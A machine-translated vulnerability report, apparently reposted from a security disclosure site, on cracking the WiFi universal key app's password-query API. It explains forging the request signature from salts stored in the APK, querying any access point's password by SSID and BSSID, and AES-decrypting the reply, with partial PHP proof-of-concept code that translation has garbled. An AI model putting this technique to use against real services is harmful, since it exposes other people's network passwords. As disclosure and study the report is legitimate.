WIFI universal key password query interface algorithm cracking (unlimited query of users' AP plaintext passwords)

Source: Internet
Author: User
Tags bssid

WIFI universal key password query interface algorithm cracking (unlimited query of users' AP plaintext passwords)

All Apps involve communication interfaces. After reading the APP with the master key, the plaintext HTTP protocol is simple.


There is a killer in analyzing the Android program, that is, the new version of the program made API changes during the update iteration, but for compatibility consideration, the old version of the problematic API will not go offline and there will always be online...
 



1. Downloaded From GooglePlay. the WIFI universal key of Version X can be used. It can be analyzed through the package analysis algorithm (in plain text storage of various keys and salt, there is no confusion even if it is character concatenation ...)
 



This is the data packet used to query the password and the sign (Signature) algorithm in the parameter. In fact, the data is sorted and then calculated as md5 using salt. The new version of the master key also has a retSn, which achieves chain authentication and can also break through, but this report only says 1. API problems in Version x (1. in the x era, many details are obviously not well-considered, and only sign is used for security ).
 



Use JAVA to sign a password query request
 



To verify authenticity, I added a "1OpenWrt" to a nearby OpenWrt SSID, and calculated the signature query, bingo!
 





The first part is complete, but it seems that the returned password is a long string that does not actually disclose the user's plaintext password. But how can I connect without the plaintext client... Apk analysis shows that AES encryption is used, and key and iv are also leaked.
 



Continue using JAVA program
 



Hey hey, it turns out your password is this (same as this friend's analysis http://drops.wooyun.org/papers/4976)

In addition, a prompt is displayed during the test.
 



After analysis, it turns out that the dhid has a daily query quota and continues to analyze the dhid algorithm, which is returned by the server. The specific forgery is not mentioned. It is basically the analysis package, packaging the sign, and sending the package.


 



In this way, the SSID and BSSID are used to query the plaintext passwords of any AP. To prove the truth and avoid malicious use, I only release part of the POC code, and the vendor can understand it at a glance.

Function sign ($ array, $ do) {// signature algorithm $ request_str = ''; $ salt =''; $ sign = ''; // Arrays in the corresponding apk. sort the sort array, and test PHP to use ksort ($ array); foreach ($ array as $ key => $ value) {$ request_str. = $ value;} if ($ do = 'querypwd') {$ sign = md5 ($ request_str. SALT);} elseif ($ do = 'querydhid') {$ sign = md5 ($ request_str. SALT2);} else {NULL;} return $ sign ;}



Query Password

function get_pwd(){$ssid = addslashes( $_POST['ssid'] );$mac = addslashes( $_POST['mac'] );$data = '';$array = array("och" => "guanwang", "ii"=> "123456789012345","appid"=> "0006","pid"=> "qryapwd:commonswitch","mac"=>"xx:xx:xx:xx:xx:xx","lang"=>"cn","bssid"=>"$mac,","v"=>"58","ssid"=>"$ssid,","method"=>"getSecurityCheckSwitch","uhid"=> "a0000000000000000000000000000001","st"=> "m","chanid"=> "googleplay","dhid" => get_dhid());$sign = sign( $array , 'querypwd' );foreach ($array as $key => $value) {if ( $key == 'bssid') {$data .= "sign=" . strtoupper($sign) . "&";}$data .= "$key=" . urlencode( $value ) . "&";}



AES decrypted

Function decryptStrin ($ str, $ keys = AESKey, $ iv = AESIV, $ cipher_alg = MCRYPT_RIJNDAEL_128) {// Wi-Fi universal key password is encrypted using AES/CBC/NoPadding mode $ decrypted_string = mcrypt_decrypt ($ cipher_alg, $ keys, pack ("H *", $ str ), MCRYPT_MODE_CBC, $ iv); return $ decrypted_string ;}



I feel like I have learned a lot in the whole process...



PS: the old version is shared by default with the user WIFI, 1.0.8, remember? Is it true that the user agrees without knowing it?

 

vc2hpMS5wbmc=" src="http://www.bkjia.com/uploads/allimg/150408/0426331963-10.png" width="600" />


 

 

Solution:

Filter

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.